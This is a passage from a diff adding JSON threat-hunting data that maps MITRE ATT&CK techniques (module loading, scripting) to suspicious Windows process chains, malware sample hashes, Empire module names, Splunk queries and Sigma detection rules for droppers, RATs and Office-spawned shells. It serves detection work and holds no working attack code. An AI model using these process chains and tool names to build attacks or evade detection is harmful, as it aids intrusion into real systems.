"macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1129", + "command_list": [ + "control.exe", + "malware.dll", + "rundll32.exe" + ], + "commands": [ + { + "command": "control.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "malware.dll", + "source": "Threat Hunting Tables", + "name": "loaded_dll" + }, + { + "command": "rundll32.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + } + ], + "parsed_datasets": [ + { + "chain_id": "100015", + "os": "windows", + "parent_process": "control.exe", + "commandline_string": "", + "sub_process_1": "rundll32.exe", + "sub_process_2": "", + "loaded_dll": "malware.dll", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "module_load", + "mitre_attack": "T1129", + "itw_sample": "" + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1064", + "command_list": [ + "cscript.exe", + "*.jse", + "*.vbe", + "*.js", + "*.vba", + "*.vbs", + "excel.exe", + "cmd.exe", + "wscript.exe", + "sh.exe", + "bash.exe", + "mshta.exe", + "powerpoint.exe", + "winword.exe", + "powershell.exe", + "csc.exe", + "cvtres.exe", + "javaw.exe", + "java.exe", + "wscript.exe|cscript.exe", + "powershell/code_execution/invoke_metasploitpayload", + "powershell/management/invoke_script", + "Creates and executes a simple bash script." + ], + "commands": [ + { + "command": "cscript.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.jse", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vbe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.js", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vba", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.vbs", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "excel.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmd.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cscript.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "wscript.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "sh.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "bash.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "csc.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cvtres.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "wscript.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "javaw.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "java.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "wscript.exe|cscript.exe", + "source": "SysmonHunter - Scripting", + "name": "" + }, + { + "command": "powershell/code_execution/invoke_metasploitpayload", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/invoke_script", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "Creates and executes a simple bash script.", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100016", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.jse", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100017", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100018", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.js", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "4bcc2af66d843614f1a8ef0daeb1987c08ff6a5c4a9930f9307f65b07f0888bd" + }, + { + "chain_id": "100019", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vba", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "chain_id": "100020", + "os": "windows", + "parent_process": "cscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbs", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "9feb89d55680071ce79f32529591bd3d51536f9e08672cb79d0ab81b57cf905d" + }, + { + "chain_id": "100026", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100027", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100028", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100030", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100031", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100043", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "6707264f01730f55c79379d75d29000fb44c92de99b8a1d58588e05963f3dea6" + }, + { + "chain_id": "100044", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "aab57e55b04eb09ef97c7bc0c79d5c0ffeda557c7333777cd178adced03676cc" + }, + { + "chain_id": "100057", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100058", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100059", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100061", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100062", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100088", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1064", + "itw_sample": "1d20934083558bc5a23e57b4f14ec1147f19d23807e8956714b256ae64f9692c" + }, + { + "chain_id": "100089", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100090", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100091", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "wscript.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100093", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "sh.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100094", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "bash.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100097", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "csc.exe", + "sub_process_2": "cvtres.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "947ce5214919e4395a2454375972d37756e1162890c62b0bb30e2a4be9ddaf54" + }, + { + "chain_id": "100103", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100104", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.jse", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100105", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100106", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.js", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100107", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vba", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100108", + "os": "windows", + "parent_process": "wscript.exe", + "commandline_string": "", + "sub_process_1": "*.vbs", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "" + }, + { + "chain_id": "100126", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "javaw.exe", + "sub_process_2": "java.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1064", + "itw_sample": "https://www.joesandbox.com/analysis/35201/0/html" + }, + { + "name": "Scripting", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "wscript.exe|cscript.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/code_execution/invoke_metasploitpayload", + "ATT&CK Technique #1": "T1064", + "ATT&CK Technique #2": "", + "Technique": "Scripting", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_metasploitpayload\": [\"T1064\"]," + }, + { + "Empire Module": "powershell/management/invoke_script", + "ATT&CK Technique #1": "T1064", + "ATT&CK Technique #2": "", + "Technique": "Scripting", + "Concatenate for Python Dictionary": "\"powershell/management/invoke_script\": [\"T1064\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=59 OR syscall=322 | table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "This could be very overwhelming if whitelisting is not done.", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + { + "title": "WMIExec VBS Script", + "id": "966e4016-627f-44f7-8341-f394905c361f", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Florian Roth", + "references": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\cscript.exe", + "CommandLine": "*.vbs /shell *" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "references": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH" + ], + "status": "experimental", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "SourceImage": [ + "*\\System32\\cscript.exe", + "*\\System32\\wscript.exe", + "*\\System32\\mshta.exe", + "*\\winword.exe", + "*\\excel.exe" + ], + "TargetImage": "*\\SysWOW64\\\\*", + "StartModule": null + }, + "condition": "selection" + }, + "tags": [ + "attack.execution", + "attack.t1055", + "attack.t1064" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious File Characteristics due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "description": "Detects Executables without FileVersion,Description,Product,Company likely created with py2exe", + "status": "experimental", + "references": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection" + ], + "author": "Markus Neis", + "date": "2018/11/22", + "modified": "2019/11/09", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "Description": "\\?", + "FileVersion": "\\?" + }, + "selection2": { + "Description": "\\?", + "Product": "\\?" + }, + "selection3": { + "Description": "\\?", + "Company": "\\?" + }, + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "action": "global", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "references": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf" + ], + "author": "Florian Roth, Tom Ueltschi", + "date": "2017/11/10", + "modified": "2018/12/11", + "tags": [ + "attack.execution", + "attack.t1064" + ], + "detection": { + "condition": "selection" + }, + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\AppData\\Roaming\\Oracle*\\java*.exe *", + "*cscript.exe *Retrive*.vbs *" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": [ + "*\\AppData\\Roaming\\Oracle\\bin\\java*.exe", + "*\\Retrive*.vbs" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*", + "Details": "%AppData%\\Roaming\\Oracle\\bin\\\\*" + } + } + }, + { + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "experimental", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (rule)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "CommandLine": [ + "* C:\\Users\\\\*.jse *", + "* C:\\Users\\\\*.vbe *", + "* C:\\Users\\\\*.js *", + "* C:\\Users\\\\*.vba *", + "* C:\\Users\\\\*.vbs *", + "* C:\\ProgramData\\\\*.jse *", + "* C:\\ProgramData\\\\*.vbe *", + "* C:\\ProgramData\\\\*.js *", + "* C:\\ProgramData\\\\*.vba *", + "* C:\\ProgramData\\\\*.vbs *" + ] + }, + "falsepositive": { + "ParentImage": "*\\winzip*" + }, + "condition": "selection and not falsepositive" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Winzip", + "Other self-extractors" + ], + "level": "high" + }, + { + "title": "Windows Shell Spawning Suspicious Program", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "experimental", + "description": "Detects a suspicious child process of a Windows shell", + "references": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html" + ], + "author": "Florian Roth", + "date": "2018/04/06", + "modified": "2019/02/05", + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\mshta.exe", + "*\\powershell.exe", + "*\\rundll32.exe", + "*\\cscript.exe", + "*\\wscript.exe", + "*\\wmiprvse.exe" + ], + "Image": [ + "*\\schtasks.exe", + "*\\nslookup.exe", + "*\\certutil.exe", + "*\\bitsadmin.exe", + "*\\mshta.exe" + ] + }, + "falsepositives": { + "CurrentDirectory": "*\\ccmcache\\\\*" + }, + "condition": "selection and not falsepositives" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "level": "high" + }, + { + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "description": "Detects suspicious process related to rasdial.exe", + "status": "experimental", + "references": [ + "https://twitter.com/subTee/status/891298217907830785" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "rasdial" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "experimental", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", + "tags": [ + "attack.execution", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wscript.exe", + "*\\cscript.exe" + ], + "CommandLine": [ + "*.jse", + "*.vbe", + "*.js", + "*.vba" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + ], + "level": "medium" + }, + { + "title": "WMI Spawning Windows PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "experimental", + "description": "Detects WMI spawning PowerShell", + "references": [ + "https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_shell_spawn_susp_program.yml", + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e" + ], + "author": "Markus Neis / @Karneades", + "date": "2019/04/03", + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1064" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\wmiprvse.exe" + ], + "Image": [ + "*\\powershell.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "AppvClient", + "CCM" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LMD - Hash Compare" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - Hash Compare" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + 